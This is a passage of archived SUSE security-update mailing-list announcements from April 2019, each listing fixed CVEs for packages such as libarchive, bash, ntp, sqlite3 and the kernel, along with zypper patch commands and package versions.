   - SUSE Linux Enterprise Point of Sale 11-SP3:

      zypper in -t patch sleposp3-tiff-14002=1

   - SUSE Linux Enterprise Debuginfo 11-SP4:

      zypper in -t patch dbgsp4-tiff-14002=1

Package List:

   - SUSE Linux Enterprise Software Development Kit 11-SP4 (i586 ia64 ppc64 s390x x86_64):

      libtiff-devel-3.8.2-141.169.31.1

   - SUSE Linux Enterprise Software Development Kit 11-SP4 (ppc64 s390x x86_64):

      libtiff-devel-32bit-3.8.2-141.169.31.1

   - SUSE Linux Enterprise Server 11-SP4 (i586 ia64 ppc64 s390x x86_64):

      libtiff3-3.8.2-141.169.31.1
      tiff-3.8.2-141.169.31.1

   - SUSE Linux Enterprise Server 11-SP4 (ppc64 s390x x86_64):

      libtiff3-32bit-3.8.2-141.169.31.1

   - SUSE Linux Enterprise Server 11-SP4 (ia64):

      libtiff3-x86-3.8.2-141.169.31.1

   - SUSE Linux Enterprise Point of Sale 11-SP3 (i586):

      libtiff3-3.8.2-141.169.31.1
      tiff-3.8.2-141.169.31.1

   - SUSE Linux Enterprise Debuginfo 11-SP4 (i586 ia64 ppc64 s390x x86_64):

      tiff-debuginfo-3.8.2-141.169.31.1
      tiff-debugsource-3.8.2-141.169.31.1

References:

   https://www.suse.com/security/cve/CVE-2016-5102.html
   https://www.suse.com/security/cve/CVE-2019-6128.html
   https://bugzilla.suse.com/1121626
   https://bugzilla.suse.com/983268

From sle-security-updates at lists.suse.com Mon Apr 1 10:11:11 2019
From: sle-security-updates at lists.suse.com (sle-security-updates at lists.suse.com)
Date: Mon, 1 Apr 2019 18:11:11 +0200 (CEST)
Subject: SUSE-SU-2019:0831-1: moderate: Security update for libarchive
Message-ID: <20190401161111.74266FF2D@maintenance.suse.de>

SUSE Security Update: Security update for libarchive
______________________________________________________________________________

Announcement ID:    SUSE-SU-2019:0831-1
Rating:             moderate
References:         #1120653 #1120654 #1120656 #1120659 #1124341 #1124342
Cross-References:   CVE-2018-1000877 CVE-2018-1000878 CVE-2018-1000879
                    CVE-2018-1000880 CVE-2019-1000019 CVE-2019-1000020
Affected Products:
                    SUSE Linux Enterprise Module for Development Tools 15
                    SUSE Linux Enterprise Module for Basesystem 15
______________________________________________________________________________

   An update that fixes 6 vulnerabilities is now available.

Description:

   This update for libarchive fixes the following issues:

   Security issues fixed:

   - CVE-2018-1000877: Fixed a double free vulnerability in the RAR decoder
     (bsc#1120653)
   - CVE-2018-1000878: Fixed a use-after-free vulnerability in the RAR decoder
     (bsc#1120654)
   - CVE-2018-1000879: Fixed a NULL pointer dereference vulnerability in the
     ACL parser (bsc#1120656)
   - CVE-2018-1000880: Fixed an improper input validation vulnerability in the
     WARC parser (bsc#1120659)
   - CVE-2019-1000019: Fixed an out-of-bounds read vulnerability in 7zip
     decompression (bsc#1124341)
   - CVE-2019-1000020: Fixed an infinite loop vulnerability in the ISO9660
     parser (bsc#1124342)

Patch Instructions:

   To install this SUSE Security Update use the SUSE recommended installation
   methods like YaST online_update or "zypper patch".
   Alternatively you can run the command listed for your product:

   - SUSE Linux Enterprise Module for Development Tools 15:

      zypper in -t patch SUSE-SLE-Module-Development-Tools-15-2019-831=1

   - SUSE Linux Enterprise Module for Basesystem 15:

      zypper in -t patch SUSE-SLE-Module-Basesystem-15-2019-831=1

Package List:

   - SUSE Linux Enterprise Module for Development Tools 15 (aarch64 ppc64le s390x x86_64):

      bsdtar-3.3.2-3.8.4
      bsdtar-debuginfo-3.3.2-3.8.4
      libarchive-debugsource-3.3.2-3.8.4

   - SUSE Linux Enterprise Module for Basesystem 15 (aarch64 ppc64le s390x x86_64):

      libarchive-debugsource-3.3.2-3.8.4
      libarchive-devel-3.3.2-3.8.4
      libarchive13-3.3.2-3.8.4
      libarchive13-debuginfo-3.3.2-3.8.4

References:

   https://www.suse.com/security/cve/CVE-2018-1000877.html
   https://www.suse.com/security/cve/CVE-2018-1000878.html
   https://www.suse.com/security/cve/CVE-2018-1000879.html
   https://www.suse.com/security/cve/CVE-2018-1000880.html
   https://www.suse.com/security/cve/CVE-2019-1000019.html
   https://www.suse.com/security/cve/CVE-2019-1000020.html
   https://bugzilla.suse.com/1120653
   https://bugzilla.suse.com/1120654
   https://bugzilla.suse.com/1120656
   https://bugzilla.suse.com/1120659
   https://bugzilla.suse.com/1124341
   https://bugzilla.suse.com/1124342

From sle-security-updates at lists.suse.com Mon Apr 1 10:12:42 2019
From: sle-security-updates at lists.suse.com (sle-security-updates at lists.suse.com)
Date: Mon, 1 Apr 2019 18:12:42 +0200 (CEST)
Subject: SUSE-SU-2019:14005-1: Security update for ed
Message-ID: <20190401161242.01507FF2D@maintenance.suse.de>

SUSE Security Update: Security update for ed
______________________________________________________________________________

Announcement ID:    SUSE-SU-2019:14005-1
Rating:             low
References:         #1019807
Cross-References:   CVE-2017-5357
Affected Products:
                    SUSE Linux Enterprise Server 11-SP4
                    SUSE Linux Enterprise Debuginfo 11-SP4
______________________________________________________________________________

   An update that fixes one vulnerability is now available.

Description:

   This update for ed fixes the following security issue:

   - CVE-2017-5357: An invalid free in the regular expression handling of
     the "ed" command processing could allow local users to crash ed
     (bsc#1019807).

Patch Instructions:

   To install this SUSE Security Update use the SUSE recommended installation
   methods like YaST online_update or "zypper patch".

   Alternatively you can run the command listed for your product:

   - SUSE Linux Enterprise Server 11-SP4:

      zypper in -t patch slessp4-ed-14005=1

   - SUSE Linux Enterprise Debuginfo 11-SP4:

      zypper in -t patch dbgsp4-ed-14005=1

Package List:

   - SUSE Linux Enterprise Server 11-SP4 (i586 ia64 ppc64 s390x x86_64):

      ed-0.2-1001.30.3.4

   - SUSE Linux Enterprise Debuginfo 11-SP4 (i586 ia64 ppc64 s390x x86_64):

      ed-debuginfo-0.2-1001.30.3.4
      ed-debugsource-0.2-1001.30.3.4

References:

   https://www.suse.com/security/cve/CVE-2017-5357.html
   https://bugzilla.suse.com/1019807

From sle-security-updates at lists.suse.com Mon Apr 1 10:13:23 2019
From: sle-security-updates at lists.suse.com (sle-security-updates at lists.suse.com)
Date: Mon, 1 Apr 2019 18:13:23 +0200 (CEST)
Subject: SUSE-SU-2019:14004-1: moderate: Security update for ntp
Message-ID: <20190401161323.6C4F8FF2D@maintenance.suse.de>

SUSE Security Update: Security update for ntp
______________________________________________________________________________

Announcement ID:    SUSE-SU-2019:14004-1
Rating:             moderate
References:         #1001182 #1128525
Cross-References:   CVE-2019-8936
Affected Products:
                    SUSE Linux Enterprise Point of Sale 11-SP3
                    SUSE Linux Enterprise Debuginfo 11-SP3
______________________________________________________________________________

   An update that solves one vulnerability and has one errata is now available.

Description:

   This update for ntp fixes the following issues:

   Security issue fixed:

   - CVE-2019-8936: Fixed a null pointer dereference which could allow an
     authenticated attacker to cause a segmentation fault in ntpd
     (bsc#1128525).
   Other issues addressed:

   - Make sure that the SLE12 version is higher than the one in SLE11
     (bsc#1001182).
   - Fixed several bugs in the BANCOMM reclock driver.
   - Fixed ntp_loopfilter.c snprintf compilation warnings.
   - Fixed spurious initgroups() error message.
   - Fixed STA_NANO struct timex units.
   - Fixed GPS week rollover in libparse.
   - Fixed incorrect poll interval in packet.
   - Added a missing check for ENABLE_CMAC.

Patch Instructions:

   To install this SUSE Security Update use the SUSE recommended installation
   methods like YaST online_update or "zypper patch".

   Alternatively you can run the command listed for your product:

   - SUSE Linux Enterprise Point of Sale 11-SP3:

      zypper in -t patch sleposp3-ntp-14004=1

   - SUSE Linux Enterprise Debuginfo 11-SP3:

      zypper in -t patch dbgsp3-ntp-14004=1

Package List:

   - SUSE Linux Enterprise Point of Sale 11-SP3 (i586):

      ntp-4.2.8p13-48.27.1
      ntp-doc-4.2.8p13-48.27.1

   - SUSE Linux Enterprise Debuginfo 11-SP3 (i586 s390x x86_64):

      ntp-debuginfo-4.2.8p13-48.27.1
      ntp-debugsource-4.2.8p13-48.27.1

References:

   https://www.suse.com/security/cve/CVE-2019-8936.html
   https://bugzilla.suse.com/1001182
   https://bugzilla.suse.com/1128525

From sle-security-updates at lists.suse.com Mon Apr 1 10:14:55 2019
From: sle-security-updates at lists.suse.com (sle-security-updates at lists.suse.com)
Date: Mon, 1 Apr 2019 18:14:55 +0200 (CEST)
Subject: SUSE-SU-2019:14003-1: moderate: Security update for sqlite3
Message-ID: <20190401161455.592F1FF2D@maintenance.suse.de>

SUSE Security Update: Security update for sqlite3
______________________________________________________________________________

Announcement ID:    SUSE-SU-2019:14003-1
Rating:             moderate
References:         #1119687
Cross-References:   CVE-2018-20346
Affected Products:
                    SUSE Studio Onsite 1.3
                    SUSE Linux Enterprise Software Development Kit 11-SP4
                    SUSE Linux Enterprise Server 11-SP4
                    SUSE Linux Enterprise Point of Sale 11-SP3
                    SUSE Linux Enterprise Debuginfo 11-SP4
______________________________________________________________________________

   An update that fixes one vulnerability is now available.

Description:

   This update for sqlite3 fixes the following issue:

   Security issue fixed:

   - CVE-2018-20346: Fixed a remote code execution vulnerability in FTS3
     (Magellan) (bsc#1119687).

Patch Instructions:

   To install this SUSE Security Update use the SUSE recommended installation
   methods like YaST online_update or "zypper patch".

   Alternatively you can run the command listed for your product:

   - SUSE Studio Onsite 1.3:

      zypper in -t patch slestso13-sqlite3-14003=1

   - SUSE Linux Enterprise Software Development Kit 11-SP4:

      zypper in -t patch sdksp4-sqlite3-14003=1

   - SUSE Linux Enterprise Server 11-SP4:

      zypper in -t patch slessp4-sqlite3-14003=1

   - SUSE Linux Enterprise Point of Sale 11-SP3:

      zypper in -t patch sleposp3-sqlite3-14003=1

   - SUSE Linux Enterprise Debuginfo 11-SP4:

      zypper in -t patch dbgsp4-sqlite3-14003=1

Package List:

   - SUSE Studio Onsite 1.3 (x86_64):

      sqlite3-devel-3.7.6.3-1.4.7.3.1

   - SUSE Linux Enterprise Software Development Kit 11-SP4 (i586 ia64 ppc64 s390x x86_64):

      sqlite3-devel-3.7.6.3-1.4.7.3.1

   - SUSE Linux Enterprise Server 11-SP4 (i586 ia64 ppc64 s390x x86_64):

      libsqlite3-0-3.7.6.3-1.4.7.3.1
      sqlite3-3.7.6.3-1.4.7.3.1

   - SUSE Linux Enterprise Server 11-SP4 (ppc64 s390x x86_64):

      libsqlite3-0-32bit-3.7.6.3-1.4.7.3.1

   - SUSE Linux Enterprise Server 11-SP4 (ia64):

      libsqlite3-0-x86-3.7.6.3-1.4.7.3.1

   - SUSE Linux Enterprise Point of Sale 11-SP3 (i586):

      libsqlite3-0-3.7.6.3-1.4.7.3.1
      sqlite3-3.7.6.3-1.4.7.3.1

   - SUSE Linux Enterprise Debuginfo 11-SP4 (i586 ia64 ppc64 s390x x86_64):

      sqlite3-debuginfo-3.7.6.3-1.4.7.3.1

References:

   https://www.suse.com/security/cve/CVE-2018-20346.html
   https://bugzilla.suse.com/1119687

From sle-security-updates at lists.suse.com Tue Apr 2 07:10:17 2019
From: sle-security-updates at lists.suse.com (sle-security-updates at lists.suse.com)
Date: Tue, 2 Apr 2019 15:10:17 +0200 (CEST)
Subject: SUSE-SU-2019:0838-1: important: Security update for bash
Message-ID: <20190402131017.1D666F7BB@maintenance.suse.de>

SUSE Security Update: Security update for bash
______________________________________________________________________________

Announcement ID:    SUSE-SU-2019:0838-1
Rating:             important
References:         #1130324
Cross-References:   CVE-2019-9924
Affected Products:
                    SUSE Linux Enterprise Workstation Extension 12-SP4
                    SUSE Linux Enterprise Workstation Extension 12-SP3
                    SUSE Linux Enterprise Software Development Kit 12-SP4
                    SUSE Linux Enterprise Software Development Kit 12-SP3
                    SUSE Linux Enterprise Server 12-SP4
                    SUSE Linux Enterprise Server 12-SP3
                    SUSE Linux Enterprise Desktop 12-SP4
                    SUSE Linux Enterprise Desktop 12-SP3
                    SUSE CaaS Platform ALL
                    SUSE CaaS Platform 3.0
                    OpenStack Cloud Magnum Orchestration 7
______________________________________________________________________________

   An update that fixes one vulnerability is now available.

Description:

   This update for bash fixes the following issues:

   Security issue fixed:

   - CVE-2019-9924: Fixed a vulnerability in which the shell did not prevent
     the user from modifying BASH_CMDS, allowing the user to execute any
     command with the permissions of the shell (bsc#1130324).

Patch Instructions:

   To install this SUSE Security Update use the SUSE recommended installation
   methods like YaST online_update or "zypper patch".
   Alternatively you can run the command listed for your product:

   - SUSE Linux Enterprise Workstation Extension 12-SP4:

      zypper in -t patch SUSE-SLE-WE-12-SP4-2019-838=1

   - SUSE Linux Enterprise Workstation Extension 12-SP3:

      zypper in -t patch SUSE-SLE-WE-12-SP3-2019-838=1

   - SUSE Linux Enterprise Software Development Kit 12-SP4:

      zypper in -t patch SUSE-SLE-SDK-12-SP4-2019-838=1

   - SUSE Linux Enterprise Software Development Kit 12-SP3:

      zypper in -t patch SUSE-SLE-SDK-12-SP3-2019-838=1

   - SUSE Linux Enterprise Server 12-SP4:

      zypper in -t patch SUSE-SLE-SERVER-12-SP4-2019-838=1

   - SUSE Linux Enterprise Server 12-SP3:

      zypper in -t patch SUSE-SLE-SERVER-12-SP3-2019-838=1

   - SUSE Linux Enterprise Desktop 12-SP4:

      zypper in -t patch SUSE-SLE-DESKTOP-12-SP4-2019-838=1

   - SUSE Linux Enterprise Desktop 12-SP3:

      zypper in -t patch SUSE-SLE-DESKTOP-12-SP3-2019-838=1

   - SUSE CaaS Platform ALL:

      To install this update, use the SUSE CaaS Platform Velum dashboard. It
      will inform you if it detects new updates and let you then trigger
      updating of the complete cluster in a controlled way.

   - SUSE CaaS Platform 3.0:

      To install this update, use the SUSE CaaS Platform Velum dashboard. It
      will inform you if it detects new updates and let you then trigger
      updating of the complete cluster in a controlled way.
   - OpenStack Cloud Magnum Orchestration 7:

      zypper in -t patch SUSE-OpenStack-Cloud-Magnum-Orchestration-7-2019-838=1

Package List:

   - SUSE Linux Enterprise Workstation Extension 12-SP4 (noarch):

      bash-lang-4.3-83.23.1

   - SUSE Linux Enterprise Workstation Extension 12-SP3 (noarch):

      bash-lang-4.3-83.23.1

   - SUSE Linux Enterprise Software Development Kit 12-SP4 (aarch64 ppc64le s390x x86_64):

      bash-debuginfo-4.3-83.23.1
      bash-debugsource-4.3-83.23.1
      bash-devel-4.3-83.23.1
      readline-devel-6.3-83.23.1

   - SUSE Linux Enterprise Software Development Kit 12-SP3 (aarch64 ppc64le s390x x86_64):

      bash-debuginfo-4.3-83.23.1
      bash-debugsource-4.3-83.23.1
      bash-devel-4.3-83.23.1
      readline-devel-6.3-83.23.1

   - SUSE Linux Enterprise Server 12-SP4 (aarch64 ppc64le s390x x86_64):

      bash-4.3-83.23.1
      bash-debuginfo-4.3-83.23.1
      bash-debugsource-4.3-83.23.1
      libreadline6-6.3-83.23.1
      libreadline6-debuginfo-6.3-83.23.1

   - SUSE Linux Enterprise Server 12-SP4 (s390x x86_64):

      libreadline6-32bit-6.3-83.23.1
      libreadline6-debuginfo-32bit-6.3-83.23.1

   - SUSE Linux Enterprise Server 12-SP4 (noarch):

      bash-doc-4.3-83.23.1
      readline-doc-6.3-83.23.1

   - SUSE Linux Enterprise Server 12-SP3 (aarch64 ppc64le s390x x86_64):

      bash-4.3-83.23.1
      bash-debuginfo-4.3-83.23.1
      bash-debugsource-4.3-83.23.1
      libreadline6-6.3-83.23.1
      libreadline6-debuginfo-6.3-83.23.1

   - SUSE Linux Enterprise Server 12-SP3 (s390x x86_64):

      libreadline6-32bit-6.3-83.23.1
      libreadline6-debuginfo-32bit-6.3-83.23.1

   - SUSE Linux Enterprise Server 12-SP3 (noarch):

      bash-doc-4.3-83.23.1
      readline-doc-6.3-83.23.1

   - SUSE Linux Enterprise Desktop 12-SP4 (x86_64):

      bash-4.3-83.23.1
      bash-debuginfo-4.3-83.23.1
      bash-debugsource-4.3-83.23.1
      libreadline6-32bit-6.3-83.23.1
      libreadline6-6.3-83.23.1
      libreadline6-debuginfo-32bit-6.3-83.23.1
      libreadline6-debuginfo-6.3-83.23.1

   - SUSE Linux Enterprise Desktop 12-SP4 (noarch):

      bash-doc-4.3-83.23.1
      bash-lang-4.3-83.23.1
      readline-doc-6.3-83.23.1

   - SUSE Linux Enterprise Desktop 12-SP3 (x86_64):

      bash-4.3-83.23.1
      bash-debuginfo-4.3-83.23.1
      bash-debugsource-4.3-83.23.1
      libreadline6-32bit-6.3-83.23.1
      libreadline6-6.3-83.23.1
      libreadline6-debuginfo-32bit-6.3-83.23.1
      libreadline6-debuginfo-6.3-83.23.1

   - SUSE Linux Enterprise Desktop 12-SP3 (noarch):

      bash-doc-4.3-83.23.1
      bash-lang-4.3-83.23.1
      readline-doc-6.3-83.23.1

   - SUSE CaaS Platform ALL (x86_64):

      bash-4.3-83.23.1
      bash-debuginfo-4.3-83.23.1
      bash-debugsource-4.3-83.23.1
      libreadline6-6.3-83.23.1
      libreadline6-debuginfo-6.3-83.23.1

   - SUSE CaaS Platform 3.0 (x86_64):

      bash-4.3-83.23.1
      bash-debuginfo-4.3-83.23.1
      bash-debugsource-4.3-83.23.1
      libreadline6-6.3-83.23.1
      libreadline6-debuginfo-6.3-83.23.1

   - OpenStack Cloud Magnum Orchestration 7 (x86_64):

      bash-4.3-83.23.1
      bash-debuginfo-4.3-83.23.1
      bash-debugsource-4.3-83.23.1
      libreadline6-6.3-83.23.1
      libreadline6-debuginfo-6.3-83.23.1

References:

   https://www.suse.com/security/cve/CVE-2019-9924.html
   https://bugzilla.suse.com/1130324

From sle-security-updates at lists.suse.com Tue Apr 2 10:17:03 2019
From: sle-security-updates at lists.suse.com (sle-security-updates at lists.suse.com)
Date: Tue, 2 Apr 2019 18:17:03 +0200 (CEST)
Subject: SUSE-SU-2019:0841-1: moderate: Security update for bluez
Message-ID: <20190402161703.34510F7BB@maintenance.suse.de>

SUSE Security Update: Security update for bluez
______________________________________________________________________________

Announcement ID:    SUSE-SU-2019:0841-1
Rating:             moderate
References:         #1015173
Cross-References:   CVE-2016-9918
Affected Products:
                    SUSE Linux Enterprise Workstation Extension 15
                    SUSE Linux Enterprise Module for Open Buildservice Development Tools 15
                    SUSE Linux Enterprise Module for Desktop Applications 15
                    SUSE Linux Enterprise Module for Basesystem 15
______________________________________________________________________________

   An update that fixes one vulnerability is now available.
Description:

   This update for bluez fixes the following issues:

   Security issue fixed:

   - CVE-2016-9918: Fixed an out-of-bounds read in the packet_hexdump
     function (bsc#1015173)

Patch Instructions:

   To install this SUSE Security Update use the SUSE recommended installation
   methods like YaST online_update or "zypper patch".

   Alternatively you can run the command listed for your product:

   - SUSE Linux Enterprise Workstation Extension 15:

      zypper in -t patch SUSE-SLE-Product-WE-15-2019-841=1

   - SUSE Linux Enterprise Module for Open Buildservice Development Tools 15:

      zypper in -t patch SUSE-SLE-Module-Development-Tools-OBS-15-2019-841=1

   - SUSE Linux Enterprise Module for Desktop Applications 15:

      zypper in -t patch SUSE-SLE-Module-Desktop-Applications-15-2019-841=1

   - SUSE Linux Enterprise Module for Basesystem 15:

      zypper in -t patch SUSE-SLE-Module-Basesystem-15-2019-841=1

Package List:

   - SUSE Linux Enterprise Workstation Extension 15 (x86_64):

      bluez-cups-5.48-5.13.10
      bluez-cups-debuginfo-5.48-5.13.10
      bluez-debuginfo-5.48-5.13.10
      bluez-debugsource-5.48-5.13.10

   - SUSE Linux Enterprise Module for Open Buildservice Development Tools 15 (aarch64 ppc64le s390x x86_64):

      bluez-debuginfo-5.48-5.13.10
      bluez-debugsource-5.48-5.13.10
      bluez-test-5.48-5.13.10
      bluez-test-debuginfo-5.48-5.13.10

   - SUSE Linux Enterprise Module for Open Buildservice Development Tools 15 (noarch):

      bluez-auto-enable-devices-5.48-5.13.10

   - SUSE Linux Enterprise Module for Desktop Applications 15 (aarch64 ppc64le s390x x86_64):

      bluez-5.48-5.13.10
      bluez-debuginfo-5.48-5.13.10
      bluez-debugsource-5.48-5.13.10
      bluez-devel-5.48-5.13.10

   - SUSE Linux Enterprise Module for Basesystem 15 (aarch64 ppc64le s390x x86_64):

      bluez-debuginfo-5.48-5.13.10
      bluez-debugsource-5.48-5.13.10
      libbluetooth3-5.48-5.13.10
      libbluetooth3-debuginfo-5.48-5.13.10

References:

   https://www.suse.com/security/cve/CVE-2016-9918.html
   https://bugzilla.suse.com/1015173

From sle-security-updates at lists.suse.com Tue Apr 2 10:19:43 2019
From: sle-security-updates at lists.suse.com (sle-security-updates at lists.suse.com)
Date: Tue, 2 Apr 2019 18:19:43 +0200 (CEST)
Subject: SUSE-SU-2019:0839-1: moderate: Security update for file
Message-ID: <20190402161943.AA87BF7BB@maintenance.suse.de>

SUSE Security Update: Security update for file
______________________________________________________________________________

Announcement ID:    SUSE-SU-2019:0839-1
Rating:             moderate
References:         #1096974 #1096984 #1126117 #1126118 #1126119
Cross-References:   CVE-2018-10360 CVE-2019-8905 CVE-2019-8906 CVE-2019-8907
Affected Products:
                    SUSE Linux Enterprise Software Development Kit 12-SP4
                    SUSE Linux Enterprise Software Development Kit 12-SP3
                    SUSE Linux Enterprise Server 12-SP4
                    SUSE Linux Enterprise Server 12-SP3
                    SUSE Linux Enterprise Desktop 12-SP4
                    SUSE Linux Enterprise Desktop 12-SP3
                    SUSE CaaS Platform ALL
                    SUSE CaaS Platform 3.0
                    OpenStack Cloud Magnum Orchestration 7
______________________________________________________________________________

   An update that solves four vulnerabilities and has one errata is now available.

Description:

   This update for file fixes the following issues:

   The following security vulnerabilities were addressed:

   - CVE-2018-10360: Fixed an out-of-bounds read in the function do_core_note
     in readelf.c, which allowed remote attackers to cause a denial of service
     (application crash) via a crafted ELF file (bsc#1096974)
   - CVE-2019-8905: Fixed a stack-based buffer over-read in do_core_note in
     readelf.c (bsc#1126118)
   - CVE-2019-8906: Fixed an out-of-bounds read in do_core_note in readelf.c
     (bsc#1126119)
   - CVE-2019-8907: Fixed a stack corruption in do_core_note in readelf.c
     (bsc#1126117)

Patch Instructions:

   To install this SUSE Security Update use the SUSE recommended installation
   methods like YaST online_update or "zypper patch".
   Alternatively you can run the command listed for your product:

   - SUSE Linux Enterprise Software Development Kit 12-SP4:

      zypper in -t patch SUSE-SLE-SDK-12-SP4-2019-839=1

   - SUSE Linux Enterprise Software Development Kit 12-SP3:

      zypper in -t patch SUSE-SLE-SDK-12-SP3-2019-839=1

   - SUSE Linux Enterprise Server 12-SP4:

      zypper in -t patch SUSE-SLE-SERVER-12-SP4-2019-839=1

   - SUSE Linux Enterprise Server 12-SP3:

      zypper in -t patch SUSE-SLE-SERVER-12-SP3-2019-839=1

   - SUSE Linux Enterprise Desktop 12-SP4:

      zypper in -t patch SUSE-SLE-DESKTOP-12-SP4-2019-839=1

   - SUSE Linux Enterprise Desktop 12-SP3:

      zypper in -t patch SUSE-SLE-DESKTOP-12-SP3-2019-839=1

   - SUSE CaaS Platform ALL:

      To install this update, use the SUSE CaaS Platform Velum dashboard. It
      will inform you if it detects new updates and let you then trigger
      updating of the complete cluster in a controlled way.

   - SUSE CaaS Platform 3.0:

      To install this update, use the SUSE CaaS Platform Velum dashboard. It
      will inform you if it detects new updates and let you then trigger
      updating of the complete cluster in a controlled way.
   - OpenStack Cloud Magnum Orchestration 7:

      zypper in -t patch SUSE-OpenStack-Cloud-Magnum-Orchestration-7-2019-839=1

Package List:

   - SUSE Linux Enterprise Software Development Kit 12-SP4 (aarch64 ppc64le s390x x86_64):

      file-debuginfo-5.22-10.12.2
      file-debugsource-5.22-10.12.2
      file-devel-5.22-10.12.2
      python-magic-5.22-10.12.2

   - SUSE Linux Enterprise Software Development Kit 12-SP3 (aarch64 ppc64le s390x x86_64):

      file-debuginfo-5.22-10.12.2
      file-debugsource-5.22-10.12.2
      file-devel-5.22-10.12.2
      python-magic-5.22-10.12.2

   - SUSE Linux Enterprise Server 12-SP4 (aarch64 ppc64le s390x x86_64):

      file-5.22-10.12.2
      file-debuginfo-5.22-10.12.2
      file-debugsource-5.22-10.12.2
      file-magic-5.22-10.12.2
      libmagic1-5.22-10.12.2
      libmagic1-debuginfo-5.22-10.12.2

   - SUSE Linux Enterprise Server 12-SP4 (s390x x86_64):

      libmagic1-32bit-5.22-10.12.2
      libmagic1-debuginfo-32bit-5.22-10.12.2

   - SUSE Linux Enterprise Server 12-SP3 (aarch64 ppc64le s390x x86_64):

      file-5.22-10.12.2
      file-debuginfo-5.22-10.12.2
      file-debugsource-5.22-10.12.2
      file-magic-5.22-10.12.2
      libmagic1-5.22-10.12.2
      libmagic1-debuginfo-5.22-10.12.2

   - SUSE Linux Enterprise Server 12-SP3 (s390x x86_64):

      libmagic1-32bit-5.22-10.12.2
      libmagic1-debuginfo-32bit-5.22-10.12.2

   - SUSE Linux Enterprise Desktop 12-SP4 (x86_64):

      file-5.22-10.12.2
      file-debuginfo-5.22-10.12.2
      file-debugsource-5.22-10.12.2
      file-magic-5.22-10.12.2
      libmagic1-32bit-5.22-10.12.2
      libmagic1-5.22-10.12.2
      libmagic1-debuginfo-32bit-5.22-10.12.2
      libmagic1-debuginfo-5.22-10.12.2

   - SUSE Linux Enterprise Desktop 12-SP3 (x86_64):

      file-5.22-10.12.2
      file-debuginfo-5.22-10.12.2
      file-debugsource-5.22-10.12.2
      file-magic-5.22-10.12.2
      libmagic1-32bit-5.22-10.12.2
      libmagic1-5.22-10.12.2
      libmagic1-debuginfo-32bit-5.22-10.12.2
      libmagic1-debuginfo-5.22-10.12.2

   - SUSE CaaS Platform ALL (x86_64):

      file-5.22-10.12.2
      file-debuginfo-5.22-10.12.2
      file-debugsource-5.22-10.12.2
      file-magic-5.22-10.12.2
      libmagic1-5.22-10.12.2
      libmagic1-debuginfo-5.22-10.12.2

   - SUSE CaaS Platform 3.0 (x86_64):

      file-5.22-10.12.2
      file-debuginfo-5.22-10.12.2
      file-debugsource-5.22-10.12.2
      file-magic-5.22-10.12.2
      libmagic1-5.22-10.12.2
      libmagic1-debuginfo-5.22-10.12.2

   - OpenStack Cloud Magnum Orchestration 7 (x86_64):

      file-5.22-10.12.2
      file-debuginfo-5.22-10.12.2
      file-debugsource-5.22-10.12.2
      file-magic-5.22-10.12.2
      libmagic1-5.22-10.12.2
      libmagic1-debuginfo-5.22-10.12.2

References:

   https://www.suse.com/security/cve/CVE-2018-10360.html
   https://www.suse.com/security/cve/CVE-2019-8905.html
   https://www.suse.com/security/cve/CVE-2019-8906.html
   https://www.suse.com/security/cve/CVE-2019-8907.html
   https://bugzilla.suse.com/1096974
   https://bugzilla.suse.com/1096984
   https://bugzilla.suse.com/1126117
   https://bugzilla.suse.com/1126118
   https://bugzilla.suse.com/1126119

From sle-security-updates at lists.suse.com Tue Apr 2 10:24:54 2019
From: sle-security-updates at lists.suse.com (sle-security-updates at lists.suse.com)
Date: Tue, 2 Apr 2019 18:24:54 +0200 (CEST)
Subject: SUSE-SU-2019:0845-1: important: Security update for the Linux Kernel (Live Patch 8 for SLE 15)
Message-ID: <20190402162454.72C4EF7BB@maintenance.suse.de>

SUSE Security Update: Security update for the Linux Kernel (Live Patch 8 for SLE 15)
______________________________________________________________________________

Announcement ID:    SUSE-SU-2019:0845-1
Rating:             important
References:         #1124729 #1124734 #1126284 #1128378
Cross-References:   CVE-2019-6974 CVE-2019-7221 CVE-2019-8912 CVE-2019-9213
Affected Products:
                    SUSE Linux Enterprise Module for Live Patching 15
______________________________________________________________________________

   An update that fixes four vulnerabilities is now available.

Description:

   This update for the Linux Kernel 4.12.14-25_28 fixes several issues.

   The following security issues were fixed:

   - CVE-2019-9213: expand_downwards in mm/mmap.c lacked a check for the mmap
     minimum address, which made it easier for attackers to exploit kernel
     NULL pointer dereferences on non-SMAP platforms. This is related to a
     capability check for the wrong task (bsc#1128378).
   - CVE-2019-8912: af_alg_release() in crypto/af_alg.c neglected to set a
     NULL value for a certain structure member, which could have led to a
     use-after-free in sockfs_setattr (bsc#1126284).
   - CVE-2019-7221: Fixed a use-after-free vulnerability in the KVM hypervisor
     related to the emulation of a preemption timer, allowing a guest
     user/process to crash the host kernel (bsc#1124734).
   - CVE-2019-6974: kvm_ioctl_create_device in virt/kvm/kvm_main.c mishandled
     reference counting because of a race condition, leading to a
     use-after-free (bsc#1124729).

Patch Instructions:

   To install this SUSE Security Update use the SUSE recommended installation
   methods like YaST online_update or "zypper patch".

   Alternatively you can run the command listed for your product:

   - SUSE Linux Enterprise Module for Live Patching 15:

      zypper in -t patch SUSE-SLE-Module-Live-Patching-15-2019-844=1 SUSE-SLE-Module-Live-Patching-15-2019-845=1

Package List:

   - SUSE Linux Enterprise Module for Live Patching 15 (ppc64le x86_64):

      kernel-livepatch-4_12_14-25_25-default-3-2.1
      kernel-livepatch-4_12_14-25_25-default-debuginfo-3-2.1
      kernel-livepatch-4_12_14-25_28-default-2-2.1
      kernel-livepatch-4_12_14-25_28-default-debuginfo-2-2.1

References:

   https://www.suse.com/security/cve/CVE-2019-6974.html
   https://www.suse.com/security/cve/CVE-2019-7221.html
   https://www.suse.com/security/cve/CVE-2019-8912.html
   https://www.suse.com/security/cve/CVE-2019-9213.html
   https://bugzilla.suse.com/1124729
   https://bugzilla.suse.com/1124734
   https://bugzilla.suse.com/1126284
   https://bugzilla.suse.com/1128378

From sle-security-updates at lists.suse.com Tue Apr 2 10:30:00 2019
From: sle-security-updates at lists.suse.com (sle-security-updates at lists.suse.com)
Date: Tue, 2 Apr 2019 18:30:00 +0200 (CEST)
Subject: SUSE-SU-2019:14008-1: moderate: Security update for libsndfile
Message-ID: <20190402163000.CB236F7BB@maintenance.suse.de>

SUSE Security Update: Security update for libsndfile
______________________________________________________________________________

Announcement ID:    SUSE-SU-2019:14008-1
Rating:             moderate
References:         #1071767 #1071777 #1117954
Cross-References:   CVE-2017-17456 CVE-2017-17457 CVE-2018-19758
Affected Products:
                    SUSE Linux Enterprise Software Development Kit 11-SP4
                    SUSE Linux Enterprise Server 11-SP4
                    SUSE Linux Enterprise Debuginfo 11-SP4
______________________________________________________________________________

